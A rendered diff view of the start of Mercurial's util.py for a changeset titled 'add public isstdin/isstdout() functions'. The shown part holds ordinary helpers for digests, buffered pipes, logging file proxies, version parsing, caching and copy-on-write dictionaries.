util: add public isstdin/isstdout() functions
Yuya Nishihara
r36811:eca1051e default
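The isstdin()/isstdout() helpers this changeset adds land further down util.py than the context captured below. As a rough sketch, assuming the helpers classify a file object by comparing its file descriptor against the process's standard streams (the names and bodies here are illustrative, not the verbatim change):

def isstdin(f):
    # Illustrative sketch: f counts as stdin when it exposes a fileno()
    # matching the standard input descriptor.
    fileno = getattr(f, 'fileno', None)
    return fileno is not None and fileno() == sys.stdin.fileno()

def isstdout(f):
    # Illustrative sketch: same test against the standard output descriptor.
    fileno = getattr(f, 'fileno', None)
    return fileno is not None and fileno() == sys.stdout.fileno()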
@@ -1,4055 +1,4061 @@
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import bz2
import codecs
import collections
import contextlib
import errno
import gc
import hashlib
import imp
import io
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import signal
import socket
import stat
import string
import subprocess
import sys
import tempfile
import textwrap
import time
import traceback
import warnings
import zlib

from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import dateutil

base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
empty = pycompat.empty
httplib = pycompat.httplib
pickle = pycompat.pickle
queue = pycompat.queue
socketserver = pycompat.socketserver
stderr = pycompat.stderr
stdin = pycompat.stdin
stdout = pycompat.stdout
stringio = pycompat.stringio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

def isatty(fp):
    try:
        return fp.isatty()
    except AttributeError:
        return False

# glibc determines buffering on first write to stdout - if we replace a TTY
# destined stdout with a pipe destined stdout (e.g. pager), we want line
# buffering
if isatty(stdout):
    stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)

if pycompat.iswindows:
    from . import windows as platform
    stdout = platform.winstdout(stdout)
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
executablepath = platform.executablepath
expandglobs = platform.expandglobs
explainexit = platform.explainexit
findexe = platform.findexe
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
gethgcmd = platform.gethgcmd
getuser = platform.getuser
getpid = os.getpid
groupmembers = platform.groupmembers
groupname = platform.groupname
hidewindow = platform.hidewindow
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
popen = platform.popen
posixfile = platform.posixfile
quotecommand = platform.quotecommand
readpipe = platform.readpipe
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setbinary = platform.setbinary
setflags = platform.setflags
setsignalhandler = platform.setsignalhandler
shellquote = platform.shellquote
shellsplit = platform.shellsplit
spawndetached = platform.spawndetached
split = platform.split
sshargs = platform.sshargs
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
testpid = platform.testpid
umask = platform.umask
unlink = platform.unlink
username = platform.username

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass
try:
    setprocname = osutil.setprocname
except AttributeError:
    pass
try:
    unblocksignal = osutil.unblocksignal
except AttributeError:
    pass

# Python compatibility

_notset = object()

def safehasattr(thing, attr):
    return getattr(thing, attr, _notset) is not _notset

def _rapply(f, xs):
    if xs is None:
        # assume None means non-value of optional data
        return xs
    if isinstance(xs, (list, set, tuple)):
        return type(xs)(_rapply(f, x) for x in xs)
    if isinstance(xs, dict):
        return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
    return f(xs)

def rapply(f, xs):
    """Apply function recursively to every item preserving the data structure

    >>> def f(x):
    ...     return 'f(%s)' % x
    >>> rapply(f, None) is None
    True
    >>> rapply(f, 'a')
    'f(a)'
    >>> rapply(f, {'a'}) == {'f(a)'}
    True
    >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
    ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]

    >>> xs = [object()]
    >>> rapply(pycompat.identity, xs) is xs
    True
    """
    if f is pycompat.identity:
        # fast path mainly for py2
        return xs
    return _rapply(f, xs)

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits

# Python 2.6 still has deprecation warnings enabled by default. We do not want
# to display anything to standard users, so detect if we are running tests and
# only use Python deprecation warnings in that case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')

def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a Python-native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)

DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            # was '% k', which is undefined here; use the looked-up key
            raise Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (k, v, self._digester[k]))

try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

closefds = pycompat.isposix

_chunksize = 4096

class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This will be used externally as a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapses it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data

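# Usage sketch (illustrative, not part of the original file): hasbuffer lets a
# caller skip select()/poll() when data is already buffered locally:
#
#   pipe = bufferedinputpipe(proc.stdout)
#   if not pipe.hasbuffer:
#       poll([pipe.fileno()])  # only block in the OS when our buffer is empty
#   line = pipe.readline()
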
def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise

def popen2(cmd, env=None, newlines=False):
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    p = subprocess.Popen(cmd, shell=True, bufsize=-1,
                         close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         universal_newlines=newlines,
                         env=env)
    return p.stdin, p.stdout

def popen3(cmd, env=None, newlines=False):
    stdin, stdout, stderr, p = popen4(cmd, env, newlines)
    return stdin, stdout, stderr

def popen4(cmd, env=None, newlines=False, bufsize=-1):
    p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                         close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE,
                         universal_newlines=newlines,
                         env=env)
    return p.stdin, p.stdout, p.stderr, p

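# Usage sketch (illustrative): the popen2/popen3/popen4 helpers differ only in
# how many of the child's standard streams they return:
#
#   stdin, stdout = popen2(b'sort')
#   stdin.write(b'b\na\n')
#   stdin.close()
#   output = stdout.read()   # b'a\nb\n'
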
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed if a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)

class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res

DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
DATA_ESCAPE_MAP.update({
    b'\\': b'\\\\',
    b'\r': br'\r',
    b'\n': br'\n',
})
DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')

def escapedata(s):
    if isinstance(s, bytearray):
        s = bytes(s)

    return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)

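# Example (illustrative): control bytes, backslashes and high bytes come out as
# printable escapes, e.g. escapedata(b'a\nb\xff') -> b'a\\nb\\xff'.
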
class fileobjectobserver(object):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.reads = reads
        self.writes = writes

    def _writedata(self, data):
        if not self.logdata:
            self.fh.write('\n')
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            self.fh.write(': %s\n' % escapedata(data))
            return

        # Data with newlines is written to multiple lines.
        self.fh.write(':\n')
        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n' % (self.name, escapedata(line)))

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                  res))
        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        self.fh.write('%s> bufferedread(%d) -> %d' % (
            self.name, size, len(res)))
        self._writedata(res)

    def bufferedreadline(self, res):
        self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata)
    return fileobjectproxy(fh, observer)

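# Usage sketch (illustrative): mirror all activity on a file handle to stderr,
# including the transferred data:
#
#   fh = makeloggingfileobject(stderr, open('data.bin', 'rb'), b'data',
#                              logdata=True)
#   fh.read(4)   # also logs e.g. "data> read(4) -> 4: ..." to stderr
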
def version():
    """Return version information if available."""
    try:
        from . import __version__
        return __version__.version
    except ImportError:
        return 'unknown'

def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)

def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keyword args
    if func.__code__.co_argcount == 0:
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f

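# Usage sketch (illustrative): memoize any function of positional arguments:
#
#   fib = cachefunc(lambda n: n if n < 2 else fib(n - 1) + fib(n - 2))
#   fib(30)   # each subresult is computed once, then served from the cache
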
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

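# Minimal sketch (illustrative): a subclass only supplies close()/release();
# the base class turns that into context-manager behavior:
#
#   class mytransaction(transactional):
#       def close(self):
#           ...   # commit
#       def release(self):
#           ...   # abort here if close() was never reached
#
#   with mytransaction() as tr:
#       ...   # close() runs on success; release() always runs
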
989 @contextlib.contextmanager
989 @contextlib.contextmanager
990 def acceptintervention(tr=None):
990 def acceptintervention(tr=None):
991 """A context manager that closes the transaction on InterventionRequired
991 """A context manager that closes the transaction on InterventionRequired
992
992
993 If no transaction was provided, this simply runs the body and returns
993 If no transaction was provided, this simply runs the body and returns
994 """
994 """
995 if not tr:
995 if not tr:
996 yield
996 yield
997 return
997 return
998 try:
998 try:
999 yield
999 yield
1000 tr.close()
1000 tr.close()
1001 except error.InterventionRequired:
1001 except error.InterventionRequired:
1002 tr.close()
1002 tr.close()
1003 raise
1003 raise
1004 finally:
1004 finally:
1005 tr.release()
1005 tr.release()
1006
1006
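# Illustrative sketch: given a transaction-like object 'tr' (hypothetical
# here), the body commits on success *and* on InterventionRequired, which
# is what interactive, multi-step commands rely on.
#
#   with acceptintervention(tr):
#       dostep()    # hypothetical step; tr.close() runs unless some other
#                   # exception is raised, and tr.release() always runs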
1007 @contextlib.contextmanager
1007 @contextlib.contextmanager
1008 def nullcontextmanager():
1008 def nullcontextmanager():
1009 yield
1009 yield
1010
1010
1011 class _lrucachenode(object):
1011 class _lrucachenode(object):
1012 """A node in a doubly linked list.
1012 """A node in a doubly linked list.
1013
1013
1014 Holds a reference to nodes on either side as well as a key-value
1014 Holds a reference to nodes on either side as well as a key-value
1015 pair for the dictionary entry.
1015 pair for the dictionary entry.
1016 """
1016 """
1017 __slots__ = (u'next', u'prev', u'key', u'value')
1017 __slots__ = (u'next', u'prev', u'key', u'value')
1018
1018
1019 def __init__(self):
1019 def __init__(self):
1020 self.next = None
1020 self.next = None
1021 self.prev = None
1021 self.prev = None
1022
1022
1023 self.key = _notset
1023 self.key = _notset
1024 self.value = None
1024 self.value = None
1025
1025
1026 def markempty(self):
1026 def markempty(self):
1027 """Mark the node as emptied."""
1027 """Mark the node as emptied."""
1028 self.key = _notset
1028 self.key = _notset
1029
1029
1030 class lrucachedict(object):
1030 class lrucachedict(object):
1031 """Dict that caches most recent accesses and sets.
1031 """Dict that caches most recent accesses and sets.
1032
1032
1033 The dict consists of an actual backing dict - indexed by original
1033 The dict consists of an actual backing dict - indexed by original
1034 key - and a doubly linked circular list defining the order of entries in
1034 key - and a doubly linked circular list defining the order of entries in
1035 the cache.
1035 the cache.
1036
1036
1037 The head node is the newest entry in the cache. If the cache is full,
1037 The head node is the newest entry in the cache. If the cache is full,
1038 we recycle head.prev and make it the new head. Cache accesses result in
1038 we recycle head.prev and make it the new head. Cache accesses result in
1039 the node being moved to before the existing head and being marked as the
1039 the node being moved to before the existing head and being marked as the
1040 new head node.
1040 new head node.
1041 """
1041 """
1042 def __init__(self, max):
1042 def __init__(self, max):
1043 self._cache = {}
1043 self._cache = {}
1044
1044
1045 self._head = head = _lrucachenode()
1045 self._head = head = _lrucachenode()
1046 head.prev = head
1046 head.prev = head
1047 head.next = head
1047 head.next = head
1048 self._size = 1
1048 self._size = 1
1049 self._capacity = max
1049 self._capacity = max
1050
1050
1051 def __len__(self):
1051 def __len__(self):
1052 return len(self._cache)
1052 return len(self._cache)
1053
1053
1054 def __contains__(self, k):
1054 def __contains__(self, k):
1055 return k in self._cache
1055 return k in self._cache
1056
1056
1057 def __iter__(self):
1057 def __iter__(self):
1058 # We don't have to iterate in cache order, but why not.
1058 # We don't have to iterate in cache order, but why not.
1059 n = self._head
1059 n = self._head
1060 for i in range(len(self._cache)):
1060 for i in range(len(self._cache)):
1061 yield n.key
1061 yield n.key
1062 n = n.next
1062 n = n.next
1063
1063
1064 def __getitem__(self, k):
1064 def __getitem__(self, k):
1065 node = self._cache[k]
1065 node = self._cache[k]
1066 self._movetohead(node)
1066 self._movetohead(node)
1067 return node.value
1067 return node.value
1068
1068
1069 def __setitem__(self, k, v):
1069 def __setitem__(self, k, v):
1070 node = self._cache.get(k)
1070 node = self._cache.get(k)
1071 # Replace existing value and mark as newest.
1071 # Replace existing value and mark as newest.
1072 if node is not None:
1072 if node is not None:
1073 node.value = v
1073 node.value = v
1074 self._movetohead(node)
1074 self._movetohead(node)
1075 return
1075 return
1076
1076
1077 if self._size < self._capacity:
1077 if self._size < self._capacity:
1078 node = self._addcapacity()
1078 node = self._addcapacity()
1079 else:
1079 else:
1080 # Grab the last/oldest item.
1080 # Grab the last/oldest item.
1081 node = self._head.prev
1081 node = self._head.prev
1082
1082
1083 # At capacity. Kill the old entry.
1083 # At capacity. Kill the old entry.
1084 if node.key is not _notset:
1084 if node.key is not _notset:
1085 del self._cache[node.key]
1085 del self._cache[node.key]
1086
1086
1087 node.key = k
1087 node.key = k
1088 node.value = v
1088 node.value = v
1089 self._cache[k] = node
1089 self._cache[k] = node
1090 # And mark it as newest entry. No need to adjust order since it
1090 # And mark it as newest entry. No need to adjust order since it
1091 # is already self._head.prev.
1091 # is already self._head.prev.
1092 self._head = node
1092 self._head = node
1093
1093
1094 def __delitem__(self, k):
1094 def __delitem__(self, k):
1095 node = self._cache.pop(k)
1095 node = self._cache.pop(k)
1096 node.markempty()
